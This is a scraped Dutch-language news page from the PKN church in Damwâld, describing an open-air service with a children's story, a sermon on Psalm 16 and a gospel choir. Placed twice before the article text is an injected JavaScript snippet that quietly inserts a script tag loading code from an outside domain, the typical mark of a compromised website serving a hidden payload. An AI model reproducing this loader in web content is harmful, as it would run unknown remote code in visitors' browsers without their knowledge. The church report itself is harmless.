;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Terugblik op een liefelijke openluchtdienst! - PKN Damwâld

Terugblik op een liefelijke openluchtdienst!

Gepubliceerd op: maandag 5 juni

De openluchtdienst van beide PKN-kerken in Damwâld begon niet voor niets met het overbekende lied ‘Tienduizend redenen’: “De zon komt op, maakt de morgen wakker. De dag begint met een lied voor U!”.

Al voor negen uur kwamen de eerste bezoekers, gepakt en bezakt met allerlei ‘zitmiddelen’, het plein op wandelen. Net als vorig jaar was het schitterend weer; met een stralende zon en een heerlijke temperatuur was het goed toeven in de buitenlucht. Ook dit jaar was de opkomst groot. Het was een hele mooie dienst die aandachtig gevolgd werd door de vele aanwezigen, maar ook begeleid werd door het gekwetter van de verschillende vogels.

Voor de kinderen was er allereerst een reuze spannend verhaal … ’In de tuin van de reus”. Voorgangster Griet van der Galiën-Dorenbos ging vervolgens aan de hand van Psalm 16 in op het thema “een liefelijke plek”. Een inspirerende boodschap! Je bent altijd welkom bij de Here God in welke omstandigheid je ook mag verkeren.

Bijzonder was ook het optreden van het gospelkoor The Young Christian Singers uit Leeuwarden, onder leiding van Wilco Kloosterman. Een krachtig koor, onderscheidend en muzikaal van een hoog niveau. Een koor dat met passie en enthousiasme Zijn boodschap wil uitdragen. We mochten genieten van een onvergetelijke muzikale beleving, van heerlijke luisternummers, ingetogen solozang en loepzuiver … en uiteraard van samenzang.

De openluchtdienst in Damwâld is altijd weer bijzondere belevenis. Bijzonder door de locatie … op het plein voor het gemeentehuis, de muziek, de ontmoeting met Hem en met elkaar onder een open hemel en om samen te geloven en te beleven dat we Zijn kerk zijn en dat we dat ook mogen en willen uitstralen.